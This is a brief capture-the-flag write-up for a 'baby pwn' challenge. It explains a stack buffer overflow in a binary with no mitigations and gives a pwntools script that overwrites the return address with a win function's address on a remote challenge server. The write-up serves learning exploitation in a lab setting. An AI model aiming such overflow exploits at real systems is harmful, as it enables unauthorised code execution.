Baby pwn
Here's a baby pwn challenge for you to try out. Can you get the flag?
This is a simple pwn challenge. We have no mitigations enabled, and a buffer overflow:
We also have a win function:
We just need to overwrite the return address with the address of the win function:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from pwn import *
context.log_level = 'debug'
elf = ELF("./baby-pwn")
'''
io = gdb.debug("./baby-pwn", """
c
""")
'''
io = remote("34.162.142.123", 5000)
io.clean()
io.sendline(flat(
b"A" * (64 + 1 * 8),
p64(elf.sym.secret)
))
io.interactive()
This post is licensed under CC BY 4.0 by the author.